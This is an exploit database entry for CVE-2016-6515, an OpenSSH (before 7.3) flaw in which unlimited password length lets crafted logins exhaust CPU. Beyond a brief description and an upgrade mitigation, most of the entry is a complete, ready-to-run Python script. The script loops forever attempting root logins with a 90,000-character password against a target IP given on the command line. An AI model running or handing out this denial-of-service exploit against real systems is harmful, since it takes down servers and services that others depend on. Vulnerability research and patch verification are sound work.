OpenSSH before 7.3 Crypt CPU Consumption (DoS Vulnerability)

vendor:

OpenSSH

by:

Kashinath T

7,5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: OpenSSH

Affected Version From: OpenSSH before 7.3

Affected Version To: OpenSSH before 7.3

Patch Exists: YES

Related CWE: CVE-2016-6515

CPE: a:openssh:openssh

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 16.04 LTS, Centos 7

2016

OpenSSH before 7.3 Crypt CPU Consumption (DoS Vulnerability)

If the remote machine is installed and running OpenSSH version prior to 7.3, it does not limit the password length for authentication. Hence, to exploit this vulnerability' we will send a crafted data which is of 90000 characters in length to the 'password' field while attempting to log in to a remote machine via ssh with username as 'root'.

Mitigation:

Upgrade to OpenSSH version 7.3 or later.

Source

Exploit-DB raw data:

################################################################################
# Title		: OpenSSH before 7.3 Crypt CPU Consumption (DoS Vulnerability)
# Author	: Kashinath T (tkashinath@secpod.com) (www.secpod.com)
# Vendor	: http://www.openssh.com/
# Software	: http://www.openssh.com/
# Version	: OpenSSH before 7.3
# Tested on	: Ubuntu 16.04 LTS, Centos 7
# CVE 		: CVE-2016-6515
# Date		: 20-10-2016
#
# NOTE:
# If the remote machine is installed and running OpenSSH version prior to 7.3,
# it does not limit the password length for authentication. Hence, to exploit
# this vulnerability' we will send a crafted data which is of 90000 characters
# in length to the 'password' field while attempting to log in to a remote
# machine via ssh with username as 'root'.
#
# For more info refer,
# http://www.secpod.com/blog/openssh-crypt-cpu-consumption
################################################################################

import sys
from random import choice
from string import lowercase

try:
    import paramiko
except ImportError:
    print "[-] python module 'paramiko' is missing, Install paramiko with" \
          " following command 'sudo pip install paramiko'"
    sys.exit(0)


class ssh_exploit:

    def __init__(self):
        """
        Initialise the objects
        """

    def ssh_login(self, remote_ip):

        try:
            # Crafted password of length 90000
            passwd_len = 90000
            crafted_passwd = "".join(choice(lowercase)
                                     for i in range(passwd_len))

            # Connect to a remote machine via ssh
            ssh = paramiko.SSHClient()
            ssh.load_system_host_keys()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

            # calling connect in infinite loop
            print "[+] Entering infinite loop"
            while 1:
                ssh.connect(remote_ip, username='root',
                            password=crafted_passwd)

        except Exception, msg:
            print "Error in connecting to remote host : ", remote_ip
            print "Exception in : ssh_login method."
            sys.exit(msg)


def main():

    if len(sys.argv) != 2:
        print "usage: python openssh_crypt_cpu_consumption_dos.py 192.168.x.x"
        sys.exit()

    # Calling ssh_connect
    ref_obj = ssh_exploit()
    ref_obj.ssh_login(sys.argv[1])


if __name__ == "__main__":
    main()